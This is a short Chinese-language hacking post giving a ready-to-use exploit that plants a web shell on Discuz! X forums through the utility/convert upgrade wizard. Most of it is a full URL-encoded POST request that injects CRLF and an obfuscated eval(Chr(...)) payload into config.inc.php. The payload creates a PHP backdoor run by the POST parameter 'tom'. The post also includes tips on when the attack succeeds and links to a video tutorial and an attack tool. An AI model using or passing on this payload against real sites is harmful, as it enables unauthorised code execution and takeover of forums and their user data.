Discuz X 全系列漏洞GetShell漏洞EXP
实战: DZ X1.5 2.0 3.1 等均成功GetShell
动画教程: https://pan.baidu.com/s/1hqqwsXQ
工具: https://qqhack8.blog.163.com/blog/static/114147985201501511417783/
Discuz! X 系列产品升级/转换 向导 漏洞getshell
Discuz!X系列转换工具任意代码写入漏洞 getshell
有些论坛 可能路径放在其它目录 没有utility 直接convert等
如果看到 转换程序的 data/ 目录不可写 就不用试了 不成功
https://127.0.0.1/php/dzx20/utility/convert/index.php?a=config&source=d7.2_x2.0
https://127.0.0.1/php/dzx20/utility/convert/data/config.inc.php 密码是tom
a=config&source=d7.2_x2.0&submit=yes&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5baaa%0d%0a%0d%0aeval(Chr(101%29.Chr%28118%29.Chr%2897%29.Chr%28108%29.Chr%2840%29.Chr%2834%29.Chr%2836%29.Chr%2895%29.Chr%2880%29.Chr%2879%29.Chr%2883%29.Chr%2884%29.Chr%2891%29.Chr%28116%29.Chr%28111%29.Chr%28109%29.Chr%2893%29.Chr%2859%29.Chr%2834%29.Chr%2841%29.Chr%2859%29%29%3b%2f%2f%5d=localhost&newconfig%5bsource%5d%5bdbuser%5d=root&newconfig%5bsource%5d%5bdbpw%5d=&newconfig%5bsource%5d%5bdbname%5d=discuz&newconfig%5bsource%5d%5btablepre%5d=cdb_&newconfig%5bsource%5d%5bdbcharset%5d=&newconfig%5bsource%5d%5bpconnect%5d=1&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5btarget%5d%5bdbuser%5d=root&newconfig%5btarget%5d%5bdbpw%5d=&newconfig%5btarget%5d%5bdbname%5d=discuzx&newconfig%5btarget%5d%5btablepre%5d=pre_&newconfig%5btarget%5d%5bdbcharset%5d=&newconfig%5btarget%5d%5bpconnect%5d=1&submit=%b1%a3%b4%e6%b7%fe%ce%f1%c6%f7%c9%e8%d6%c3
K8飞刀提交...
当然 K8飞刀里也集成了 也可以输入网址后点击以下两按扭中的其中一个 主要是路径不一样